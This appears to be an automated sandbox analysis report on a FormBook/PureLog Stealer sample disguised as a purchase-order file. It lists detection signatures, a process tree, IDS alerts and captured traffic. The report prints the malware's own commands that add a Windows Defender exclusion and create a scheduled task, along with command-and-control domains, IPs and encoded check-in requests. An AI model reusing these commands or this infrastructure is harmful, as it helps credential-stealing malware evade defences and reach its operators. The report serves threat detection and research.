
Windows Analysis Report
Pre Alert PO TVKJEANSA00967.bat.exe

Overview

General Information

Sample name: Pre Alert PO TVKJEANSA00967.bat.exe
Analysis ID: 1563935
MD5: 574c0e8c1d426321e95bd8476334f271
SHA1: 0b43d8c96bbece4a501991ad1a0761a4710176c5
SHA256: 7e1c2d14ebc29ae8d1434d9d18d6054a16e91385051d7bb9ed183a63fafa66b8
Tags: bat, exe, user-abuse_ch

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses runas.exe to run programs with evaluated privileges
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Pre Alert PO TVKJEANSA00967.bat.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe" MD5: 574C0E8C1D426321E95BD8476334F271)
    • powershell.exe (PID: 7748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8084 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7848 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7992 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • nhClcdOjQwJ.exe (PID: 2484 cmdline: "C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 2992 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 13646BC81C39130487DA538B2DED5B28)
          • nhClcdOjQwJ.exe (PID: 5608 cmdline: "C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7920 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • STiokuWkiGFJ.exe (PID: 8064 cmdline: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe MD5: 574C0E8C1D426321E95BD8476334F271)
    • schtasks.exe (PID: 2676 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3624 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Source | Rule | Description | Author | Strings
0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
8.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
8.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ParentImage: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe, ParentProcessId: 7480, ParentProcessName: Pre Alert PO TVKJEANSA00967.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ProcessId: 7748, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe, ParentImage: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe, ParentProcessId: 8064, ParentProcessName: STiokuWkiGFJ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp", ProcessId: 2676, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ParentImage: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe, ParentProcessId: 7480, ParentProcessName: Pre Alert PO TVKJEANSA00967.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", ProcessId: 7848, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ParentImage: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe, ParentProcessId: 7480, ParentProcessName: Pre Alert PO TVKJEANSA00967.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ProcessId: 7748, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ParentImage: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe, ParentProcessId: 7480, ParentProcessName: Pre Alert PO TVKJEANSA00967.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", ProcessId: 7848, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-27T16:43:19.387146+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 15.197.142.173 | 80 | TCP
2024-11-27T16:43:44.696864+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49787 | 38.6.78.235 | 80 | TCP
2024-11-27T16:44:00.225216+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49826 | 139.162.181.76 | 80 | TCP
2024-11-27T16:44:16.039080+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49860 | 154.23.176.197 | 80 | TCP
2024-11-27T16:44:31.286011+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49898 | 194.58.112.174 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-27T16:43:19.387146+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 15.197.142.173 | 80 | TCP
2024-11-27T16:43:44.696864+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49787 | 38.6.78.235 | 80 | TCP
2024-11-27T16:44:00.225216+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49826 | 139.162.181.76 | 80 | TCP
2024-11-27T16:44:16.039080+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49860 | 154.23.176.197 | 80 | TCP
2024-11-27T16:44:31.286011+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49898 | 194.58.112.174 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-27T16:43:36.752491+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 38.6.78.235 | 80 | TCP
2024-11-27T16:43:39.370503+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49775 | 38.6.78.235 | 80 | TCP
2024-11-27T16:43:42.095834+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49781 | 38.6.78.235 | 80 | TCP
2024-11-27T16:43:51.963011+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49803 | 139.162.181.76 | 80 | TCP
2024-11-27T16:43:54.656200+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49810 | 139.162.181.76 | 80 | TCP
2024-11-27T16:43:57.614795+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49817 | 139.162.181.76 | 80 | TCP
2024-11-27T16:44:07.849372+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49841 | 154.23.176.197 | 80 | TCP
2024-11-27T16:44:10.536744+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49847 | 154.23.176.197 | 80 | TCP
2024-11-27T16:44:13.209788+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49853 | 154.23.176.197 | 80 | TCP
2024-11-27T16:44:23.316350+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49878 | 194.58.112.174 | 80 | TCP
2024-11-27T16:44:25.958240+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49884 | 194.58.112.174 | 80 | TCP
2024-11-27T16:44:28.724138+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49891 | 194.58.112.174 | 80 | TCP


AV Detection

Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | ReversingLabs: Detection: 55%
Source: Pre Alert PO TVKJEANSA00967.bat.exe | ReversingLabs: Detection: 55%
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Joe Sandbox ML: detected
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Joe Sandbox ML: detected
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000008.00000002.2069389047.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942271175.000000000051E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nhClcdOjQwJ.exe, 00000011.00000000.1994231473.000000000004E000.00000002.00000001.01000000.0000000D.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2941482691.000000000004E000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: RegSvcs.pdb, source: runas.exe, 00000012.00000002.2943817151.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000000.2137618964.0000000002E4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2364882227.00000000213EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2069287148.0000000004154000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2071135298.0000000004306000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000012.00000003.2069287148.0000000004154000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2071135298.0000000004306000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: QIoK.pdb source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.dr
Source: Binary string: RegSvcs.pdb source: runas.exe, 00000012.00000002.2943817151.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000000.2137618964.0000000002E4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2364882227.00000000213EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: QIoK.pdbSHA256 source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.dr
Source: Binary string: runas.pdb source: RegSvcs.exe, 00000008.00000002.2069389047.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942271175.000000000051E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\runas.exe | Code function: 18_2_0050C8A0 FindFirstFileW,FindNextFileW,FindClose, 18_2_0050C8A0
Source: C:\Windows\SysWOW64\runas.exe | Code function: 4x nop then xor eax, eax 18_2_004F9DE0
Source: C:\Windows\SysWOW64\runas.exe | Code function: 4x nop then mov ebx, 00000004h 18_2_043004DE

Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 38.6.78.235:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 38.6.78.235:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49787 -> 38.6.78.235:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49787 -> 38.6.78.235:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49781 -> 38.6.78.235:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49743 -> 15.197.142.173:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49743 -> 15.197.142.173:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49803 -> 139.162.181.76:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49826 -> 139.162.181.76:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49826 -> 139.162.181.76:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49810 -> 139.162.181.76:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49817 -> 139.162.181.76:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49841 -> 154.23.176.197:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49847 -> 154.23.176.197:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49853 -> 154.23.176.197:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49860 -> 154.23.176.197:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49860 -> 154.23.176.197:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49891 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49878 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49898 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49898 -> 194.58.112.174:80
Source: Joe Sandbox View | IP Address: 15.197.142.173
Source: Joe Sandbox View | IP Address: 194.58.112.174
Source: Joe Sandbox View | ASN Name: COGENT-174US
Source: Joe Sandbox View | ASN Name: TANDEMUS
Source: Joe Sandbox View | ASN Name: AS-REGRU
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /3acc/?LRW=skYxN//30ryIi85Wi0QpETYUbcdPFuXI+97QewxhrY3NM2hqn6Sq2BPHPiKxfL80eN+v/gcRWuFAYeqrMVkPGGlMHJiH0BFPFC9u+m//81WV26UqMu5nMks=&fvqp6=9vfXK HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.dojodigitize.shop
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Source: global traffic | HTTP traffic detected:
    GET /yjgs/?LRW=5PllmvK0caJhA9qO+og5+P8kc5JWR+uQLy91XhuloCAo6K0czluNggt7J8fRT5aF3DbStYNhlgg+eys4IUnD8eH0N6/eozV0E04Jm3Q8YYXSei9vmTSoi+w=&fvqp6=9vfXK HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.17jkgl.com
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Source: global traffic | HTTP traffic detected:
    GET /d43q/?fvqp6=9vfXK&LRW=qOy9fp5Cl0yUgYAEczO7dyJ+bxzOsQOuCHBFuR5y1LF4o9syCZkEzLGi7aZXV+ZbwDd0E0+zyiVRHPLTItQK1mi6x0nkeaPePZztRgCxUMm7wu9eAI3Dzhs= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.alvinsd.buzz
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Source: global traffic | HTTP traffic detected:
    GET /b20s/?LRW=tVBfi4VbWyAR4A6JwX/2lnpR3RCqqMOz/iPk8q4RNy1B2px1ZjxG3cjS/n2u+as/M6yp5i3EDz3+5965KIAUeXyPV8KfzAH0F+33TTK6hNoSGlASxdt3tI0=&fvqp6=9vfXK HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.shipincheshi.today
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Source: global traffic | HTTP traffic detected:
    GET /7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL+vM7NE/eWH/lfB0APMSfRaR1rRBz2uUzJ3oOd5olZUFD7UQvVw3JpX4K8u0SeOs3hkY= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.elinor.club
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Source: global traffic | DNS traffic detected: DNS query: www.dojodigitize.shop
Source: global traffic | DNS traffic detected: DNS query: www.17jkgl.com
Source: global traffic | DNS traffic detected: DNS query: www.alvinsd.buzz
Source: global traffic | DNS traffic detected: DNS query: www.shipincheshi.today
Source: global traffic | DNS traffic detected: DNS query: www.elinor.club
Source: unknown | HTTP traffic detected:
    POST /yjgs/ HTTP/1.1
